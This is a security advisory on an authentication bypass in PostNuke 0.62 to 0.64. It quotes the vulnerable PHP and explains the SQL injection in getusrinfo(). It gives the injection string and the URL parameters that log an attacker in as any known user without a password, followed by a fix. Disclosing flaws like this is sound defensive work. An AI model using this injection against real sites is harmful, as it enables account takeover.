Bug in PostNuke 0.62, 0.63 and 0.64 (and possibly PHPnuke)

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----- IMPACT -----
If an attacker knows the username and userid of a user on a PostNuked system, it is possible to log in as the user without specifying a password. 

Userid/username is usually available from the Members list.

A fix is available at the end of this document.

PostNuke 0.62, 0.63, 0.64
PHPnuke is not tested. Version 5.2 (and earlier) contains the same code as PostNuke and could be vulnerable.

----- BACKGROUND -----
The vulnerable code is located in article.php and mainfile2.php (mainfile.php):

o article.php:

if ($save) {
    mysql_query("update $pntable[users] set umode='$mode', uorder='$order', thold='$thold' where uid='$cookie[0]'");
    $info = base64_encode("$userinfo[uid]:$userinfo[uname]:$userinfo[pass]:$userinfo[storynum]:$userinfo[umode]:$userinfo[uorder]:$userinfo[thold]:$userinfo[noscore]");

o mainfile2.php (mainfile.php in PHPnuke and older versions of PostNuke):

function getusrinfo($user) {
    global $userinfo, $pntable;
    $user2 = base64_decode($user);
    $user3 = explode(":", $user2);
    $result = mysql_query("select uid, name, uname, email, femail, url, user_avatar, user_icq, user_occ, user_from, user_intrest, user_sig, user_viewemail, user_theme, user_aim, user_yim, user_msnm, pass, storynum, umode, uorder, thold, noscore, bio, ublockon, ublock, theme, commentmax, timezone_offset from $pntable[users] where uname='$user3[1]' and pass='$user3[2]'");
    if(mysql_num_rows($result)==1) {
        $userinfo = mysql_fetch_array($result);
    } else {
        echo "<font class=\"pn-title\">"._MPROBLEM."</font><br>";
    return $userinfo;

The bug is a result of the following issues:

o It is possible to invoke the if-clause in article.php by just specifying save=1 in the URL.

o article.php blindly accepts the $user variable specified in the URL.

o There is no code in article.php that checks if cookiedecode() actually worked and the password specified in $user is not checked against the MySQL-database.

o article.php accepts the $cookieusrtime variable as specified in the URL.

o It is possible to modify the mysql_query-string in getusrinfo() by escaping the "'" in $user[1] or $user[2]. Like this (without the double-quotes): 
   "'  or uname='USERNAME". 
getusrinfo() will then return anything with uname=USERNAME, even if the password doesn't match the one in $user. The full query-string sent to mysql will end up looking like this:

select uid, name, uname, email, femail, url, user_avatar, user_icq,
user_occ, user_from, user_intrest, user_sig, user_viewemail, user_theme,
user_aim, user_yim, user_msnm, pass, storynum, umode, uorder, thold, noscore,
bio, ublockon, ublock, theme, commentmax, timezone_offset from $prefix"._users."
where uname='USERNAME' and pass='' or uname='USERNAME'

To produce the query above the $user variable should contain a base64-encoded version of:
USERID:USERNAME:' or uname 'USERNAME'     (base64_encoded)

o When the userinfo is received from getusrinfo() by article.php, it blindly sets a "user="-cookie containing the encrypted password. 

----- EXPLOIT -----
If an attacker requests a URL consisting of...

sid=20&      [any sid will do..]
cookieusrtime=160000&     [to get a decent expire-date on the cookie]
user=USERID:USERNAME:'  or uname='USERNAME      [base64_encoded]

... and goes back to the mainpage, (s)he will be logged in as USERNAME.

----- FIX -----
Thanks to Sascha Endlicher and John Cox (www.postnuke.com) for comming up with the fix below. 

In article.php, change the offending code to:

if (($save) &&  (is_user($user))) {
    mysql_query("update $pntable[users] set umode='$mode', uorder='$order', thold='$thold' where uid='$cookie[0]'");
    $info = base64_encode("$userinfo[uid]:$userinfo[uname]:$userinfo[pass]:$userinfo[storynum]:$userinfo[umode]:$userinfo[uorder]:$userinfo[thold]:$userinfo[noscore]");

This may work in PHPnuke as well.

A new version of article.php for PostNuke is available from https://sourceforge.net/project/showfiles.php?group_id=27927 under Fixes.

Magnus Skjegstad
magnus at skjegstad.com

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